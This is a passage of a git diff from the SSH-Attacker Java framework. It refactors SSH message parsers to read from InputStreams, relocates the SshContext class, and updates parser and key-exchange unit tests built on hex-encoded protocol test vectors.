(encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS()) { + record.setEpoch(writeEpoch); + }*/ + /* Preparator preparator = packet.getPreparator(context); preparator.prepare(); preparator.afterPrepare(); @@ -199,9 +223,9 @@ public LayerProcessingResult sendData( "Could not write Record bytes to ByteArrayStream", ex); } addProducedContainer(packet); - } + }*/ - getLowerLayer().sendData(null, stream.toByteArray()); + getLowerLayer().sendData(null, additionalData); return new LayerProcessingResult<>(packets, getLayerType(), true); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java index 4fe955e60..e09d4c699 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java @@ -13,8 +13,7 @@ /** * HintedInputStream, that wraps around another Stream (used in the {@link - * de.rub.nds.tlsattacker.core.layer.impl.TcpLayer} and the {@link - * de.rub.nds.tlsattacker.core.layer.impl.UdpLayer} + * de.rub.nds.sshattacker.core.layer.impl.TcpLayer} */ public class HintedInputStreamAdapterStream extends HintedInputStream { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java index 516f176b2..128ad50ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java @@ -74,8 +74,8 @@ public abstract PacketLayerParseResult parsePacket(byte[] rawBytes, int startPos * *

//@param rawBytes Bytes to parse //@param startPosition Start position for parsing * - * @return Parse result of the packet layer containing the total number of bytes parsed as well - * as the parsed packet + *

//@return Parse result of the packet layer containing the total number of bytes parsed as + * well as the parsed packet */ /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java index 09c983cde..cd5696d3d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java @@ -69,9 +69,8 @@ public SessionCipher(SshContext sshContext, CipherState state) { * field, a 2-byte version field, and a 2-byte length field. It then calculates a MAC over the * bytes SQN || HDR || R. * - * @param session The Record for which the data should be collected - * @param protocolVersion According to which ProtocolVersion the AdditionalAuthenticationData is - * collected + * @param session The Record for which the data should be collected //@param protocolVersion + * According to which ProtocolVersion the AdditionalAuthenticationData is collected * @return The AdditionalAuthenticatedData */ protected final byte[] collectAdditionalAuthenticatedData(Session session) { diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/KeyDerivationTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/KeyDerivationTest.java index 3c0111fac..060e96624 100755 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/KeyDerivationTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/KeyDerivationTest.java @@ -16,14 +16,16 @@ import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.message.EcdhKeyExchangeInitMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.EcdhKeyExchangeReplyMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.EcdhKeyExchangeInitMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.parser.EcdhKeyExchangeReplyMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.parser.KeyExchangeInitMessageParser; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.ByteArrayInputStream; import java.io.InputStream; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; @@ -209,16 +211,18 @@ public void testComputeECDHExchangeHash() throws CryptoException { serverVersion.setVersion("SSH-2.0-OpenSSH_7.9"); serverVersion.setComment(""); - EcdhKeyExchangeInitMessage ecdhInit = - new EcdhKeyExchangeInitMessageParser( + EcdhKeyExchangeInitMessage ecdhInit = new EcdhKeyExchangeInitMessage(); + new EcdhKeyExchangeInitMessageParser( + new ByteArrayInputStream( ArrayConverter.hexStringToByteArray( - "30000000207ca8902c60338482678b029a7b4484cb69e167922865c1217203dcb8050cd043")) - .parse(); - EcdhKeyExchangeReplyMessage ecdhReply = - new EcdhKeyExchangeReplyMessageParser( + "30000000207ca8902c60338482678b029a7b4484cb69e167922865c1217203dcb8050cd043"))) + .parse(ecdhInit); + EcdhKeyExchangeReplyMessage ecdhReply = new EcdhKeyExchangeReplyMessage(); + new EcdhKeyExchangeReplyMessageParser( + new ByteArrayInputStream( ArrayConverter.hexStringToByteArray( - "31000000680000001365636473612d736861322d6e69737470323536000000086e69737470323536000000410435496f94112c3234092471322c26dd21ebfd2da156e5a17dcc5dc98020afedd64ae82e5d4c28251187a2191fe85ae43de9734711c087b784eaa713d5b6e065410000002020b9f89aba2d7da23775b3ce085ff65f4d4b7ccf51ce2d073ef9158d6df1e905000000630000001365636473612d736861322d6e6973747032353600000048000000204e553a825dd144d7ddbd38cbd10a153a8a4ad597bf8da7ef1fe2546c851d6e89000000205bc4705cdac12213822e61c3b48ab7c84489ef3be0bb94ef524a45664b473856")) - .parse(); + "31000000680000001365636473612d736861322d6e69737470323536000000086e69737470323536000000410435496f94112c3234092471322c26dd21ebfd2da156e5a17dcc5dc98020afedd64ae82e5d4c28251187a2191fe85ae43de9734711c087b784eaa713d5b6e065410000002020b9f89aba2d7da23775b3ce085ff65f4d4b7ccf51ce2d073ef9158d6df1e905000000630000001365636473612d736861322d6e6973747032353600000048000000204e553a825dd144d7ddbd38cbd10a153a8a4ad597bf8da7ef1fe2546c851d6e89000000205bc4705cdac12213822e61c3b48ab7c84489ef3be0bb94ef524a45664b473856"))) + .parse(ecdhReply); byte[] expectedHash = ArrayConverter.hexStringToByteArray( @@ -230,16 +234,21 @@ public void testComputeECDHExchangeHash() throws CryptoException { inputHolder.setClientVersion(clientVersion); inputHolder.setServerVersion(serverVersion); - inputHolder.setClientKeyExchangeInit( - new KeyExchangeInitMessageParser( + KeyExchangeInitMessage serverKeyExchangeInitMessage = new KeyExchangeInitMessage(); + KeyExchangeInitMessage clientKeyExchangeInitMessage = new KeyExchangeInitMessage(); + new KeyExchangeInitMessageParser( + new ByteArrayInputStream( ArrayConverter.hexStringToByteArray( - "14c20497e7fc475072fd94347c70ef86260000010d637572766532353531392d7368613235362c637572766532353531392d736861323536406c69627373682e6f72672c656364682d736861322d6e697374703235362c656364682d736861322d6e697374703338342c656364682d736861322d6e697374703532312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d7368613235362c6469666669652d68656c6c6d616e2d67726f757031362d7368613531322c6469666669652d68656c6c6d616e2d67726f757031382d7368613531322c6469666669652d68656c6c6d616e2d67726f757031342d7368613235362c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6578742d696e666f2d630000016665636473612d736861322d6e697374703235362d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703338342d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703532312d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703235362c65636473612d736861322d6e697374703338342c65636473612d736861322d6e697374703532312c7373682d656432353531392d636572742d763031406f70656e7373682e636f6d2c7273612d736861322d3531322d636572742d763031406f70656e7373682e636f6d2c7273612d736861322d3235362d636572742d763031406f70656e7373682e636f6d2c7373682d7273612d636572742d763031406f70656e7373682e636f6d2c7373682d656432353531392c7273612d736861322d3531322c7273612d736861322d3235362c7373682d7273610000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d0000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d73686131000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d736861310000001a6e6f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c69620000001a6e6f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c696200000000000000000000000000")) - .parse()); - inputHolder.setServerKeyExchangeInit( - new KeyExchangeInitMessageParser( + "14c20497e7fc475072fd94347c70ef86260000010d637572766532353531392d7368613235362c637572766532353531392d736861323536406c69627373682e6f72672c656364682d736861322d6e697374703235362c656364682d736861322d6e697374703338342c656364682d736861322d6e697374703532312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d7368613235362c6469666669652d68656c6c6d616e2d67726f757031362d7368613531322c6469666669652d68656c6c6d616e2d67726f757031382d7368613531322c6469666669652d68656c6c6d616e2d67726f757031342d7368613235362c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6578742d696e666f2d630000016665636473612d736861322d6e697374703235362d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703338342d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703532312d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703235362c65636473612d736861322d6e697374703338342c65636473612d736861322d6e697374703532312c7373682d656432353531392d636572742d763031406f70656e7373682e636f6d2c7273612d736861322d3531322d636572742d763031406f70656e7373682e636f6d2c7273612d736861322d3235362d636572742d763031406f70656e7373682e636f6d2c7373682d7273612d636572742d763031406f70656e7373682e636f6d2c7373682d656432353531392c7273612d736861322d3531322c7273612d736861322d3235362c7373682d7273610000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d0000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d73686131000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d736861310000001a6e6f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c69620000001a6e6f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c696200000000000000000000000000"))) + .parse(serverKeyExchangeInitMessage); + inputHolder.setClientKeyExchangeInit(serverKeyExchangeInitMessage); + + new KeyExchangeInitMessageParser( + new ByteArrayInputStream( ArrayConverter.hexStringToByteArray( - "147fe045782da34c08cbd3e03a6b4b4b1000000102637572766532353531392d7368613235362c637572766532353531392d736861323536406c69627373682e6f72672c656364682d736861322d6e697374703235362c656364682d736861322d6e697374703338342c656364682d736861322d6e697374703532312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d7368613235362c6469666669652d68656c6c6d616e2d67726f757031362d7368613531322c6469666669652d68656c6c6d616e2d67726f757031382d7368613531322c6469666669652d68656c6c6d616e2d67726f757031342d7368613235362c6469666669652d68656c6c6d616e2d67726f757031342d73686131000000417273612d736861322d3531322c7273612d736861322d3235362c7373682d7273612c65636473612d736861322d6e697374703235362c7373682d656432353531390000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d0000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d73686131000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d73686131000000156e6f6e652c7a6c6962406f70656e7373682e636f6d000000156e6f6e652c7a6c6962406f70656e7373682e636f6d00000000000000000000000000")) - .parse()); + "147fe045782da34c08cbd3e03a6b4b4b1000000102637572766532353531392d7368613235362c637572766532353531392d736861323536406c69627373682e6f72672c656364682d736861322d6e697374703235362c656364682d736861322d6e697374703338342c656364682d736861322d6e697374703532312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d7368613235362c6469666669652d68656c6c6d616e2d67726f757031362d7368613531322c6469666669652d68656c6c6d616e2d67726f757031382d7368613531322c6469666669652d68656c6c6d616e2d67726f757031342d7368613235362c6469666669652d68656c6c6d616e2d67726f757031342d73686131000000417273612d736861322d3531322c7273612d736861322d3235362c7373682d7273612c65636473612d736861322d6e697374703235362c7373682d656432353531390000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d0000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d73686131000000d5756d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d736861322d3531322c686d61632d73686131000000156e6f6e652c7a6c6962406f70656e7373682e636f6d000000156e6f6e652c7a6c6962406f70656e7373682e636f6d00000000000000000000000000"))) + .parse(clientKeyExchangeInitMessage); + inputHolder.setServerKeyExchangeInit(clientKeyExchangeInitMessage); inputHolder.setServerHostKey( PublicKeyHelper.parse( PublicKeyFormat.ECDSA_SHA2_NISTP256, diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchangeTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchangeTest.java index 0b5a5aaad..4accd5449 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchangeTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchangeTest.java @@ -16,7 +16,7 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.CryptoException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import jakarta.xml.bind.DatatypeConverter; import java.io.InputStream; import java.math.BigInteger; diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParserTest.java index 977eb0dea..7efc50999 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthBannerMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -49,8 +50,10 @@ public static Stream provideTestVectors() { @MethodSource("provideTestVectors") public void testParse( byte[] providedBytes, String expectedMessage, String expectedLanguageTag) { - UserAuthBannerMessageParser parser = new UserAuthBannerMessageParser(providedBytes); - UserAuthBannerMessage msg = parser.parse(); + UserAuthBannerMessageParser parser = + new UserAuthBannerMessageParser(new ByteArrayInputStream(providedBytes)); + UserAuthBannerMessage msg = new UserAuthBannerMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_USERAUTH_BANNER.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParserTest.java index 52c194cf3..3cc9e8aa3 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthFailureMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -56,8 +57,10 @@ public void testParse( byte[] providedBytes, String expectedAuthenticationMethods, byte expectedPartialSuccess) { - UserAuthFailureMessageParser parser = new UserAuthFailureMessageParser(providedBytes); - UserAuthFailureMessage msg = parser.parse(); + UserAuthFailureMessageParser parser = + new UserAuthFailureMessageParser(new ByteArrayInputStream(providedBytes)); + UserAuthFailureMessage msg = new UserAuthFailureMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_USERAUTH_FAILURE.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParserTest.java index 127d725e1..d6e6a27d3 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParserTest.java @@ -10,14 +10,18 @@ import static org.junit.jupiter.api.Assertions.assertEquals; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthSuccessMessage; +import java.io.ByteArrayInputStream; import org.junit.jupiter.api.Test; public class UserAuthSuccessMessageParserTest { /** Test of UserAuthSuccessMessageParser::parse method */ @Test public void testParse() { - UserAuthSuccessMessage msg = new UserAuthSuccessMessageParser(new byte[] {52}).parse(); + UserAuthSuccessMessage msg = new UserAuthSuccessMessage(); + Parser parser = new UserAuthSuccessMessageParser(new ByteArrayInputStream(new byte[] {52})); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_USERAUTH_SUCCESS.getId(), msg.getMessageId().getValue()); } diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java index d2ac8555f..5c654b931 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/common/CyclicParserSerializerTest.java @@ -13,11 +13,14 @@ import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; import de.rub.nds.sshattacker.core.exceptions.ParserException; import de.rub.nds.sshattacker.core.exceptions.PreparationException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.HybridKeyExchangeReplyMessage; -import de.rub.nds.sshattacker.core.state.SshContext; +import java.io.ByteArrayInputStream; +import java.io.InputStream; import java.lang.reflect.Constructor; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Modifier; @@ -119,7 +122,7 @@ public void execute() { } // Prepare the message given the fresh context try { - message.getHandler(context).getPreparator().prepare(); + message.getPreparator(context).prepare(); } catch (PreparationException e) { LOGGER.fatal(e); fail( @@ -138,7 +141,7 @@ public void execute() { // Serialize message into a byte array byte[] serializedMessage = null; try { - serializedMessage = message.getHandler(context).getSerializer().serialize(); + serializedMessage = message.getSerializer(context).serialize(); } catch (SerializationException e) { LOGGER.fatal(e); fail( @@ -156,8 +159,10 @@ public void execute() { // Parse the serialized message back into a new instance ProtocolMessage parsedMessage = null; + InputStream streamedMessage = new ByteArrayInputStream(serializedMessage); try { - parsedMessage = message.getHandler(context).getParser(serializedMessage).parse(); + Parser parser = message.getParser(context, streamedMessage); + parser.parse(parsedMessage); } catch (ParserException e) { LOGGER.fatal(e); fail( @@ -178,8 +183,7 @@ public void execute() { // This validates the order parse -> serialize try { assertArrayEquals( - serializedMessage, - parsedMessage.getHandler(context).getSerializer().serialize()); + serializedMessage, parsedMessage.getSerializer(context).serialize()); } catch (SerializationException e) { LOGGER.fatal(e); fail( diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParserTest.java index ede0ab0fa..2743fcebf 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelCloseMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -38,8 +39,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, int expectedRecipientChannel) { - ChannelCloseMessageParser parser = new ChannelCloseMessageParser(providedBytes); - ChannelCloseMessage msg = parser.parse(); + ChannelCloseMessageParser parser = + new ChannelCloseMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelCloseMessage msg = new ChannelCloseMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_CHANNEL_CLOSE.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParserTest.java index 6d008b6dd..3ce6c1ee6 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelDataMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -51,8 +52,10 @@ public static Stream provideTestVectors() { @MethodSource("provideTestVectors") public void testParse( byte[] providedBytes, int expectedRecipientChannel, byte[] expectedPayload) { - ChannelDataMessageParser parser = new ChannelDataMessageParser(providedBytes); - ChannelDataMessage msg = parser.parse(); + ChannelDataMessageParser parser = + new ChannelDataMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelDataMessage msg = new ChannelDataMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_CHANNEL_DATA.getId(), msg.getMessageId().getValue()); assertEquals(expectedRecipientChannel, msg.getRecipientChannelId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParserTest.java index 6a5a6f33b..937f24373 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelEofMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -38,8 +39,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, int expectedRecipientChannel) { - ChannelEofMessageParser parser = new ChannelEofMessageParser(providedBytes); - ChannelEofMessage msg = parser.parse(); + ChannelEofMessageParser parser = + new ChannelEofMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelEofMessage msg = new ChannelEofMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_CHANNEL_EOF.getId(), msg.getMessageId().getValue()); assertEquals(expectedRecipientChannel, msg.getRecipientChannelId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParserTest.java index 5fa1b6a47..d2b5eae18 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParserTest.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.constants.ExtendedChannelDataType; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import 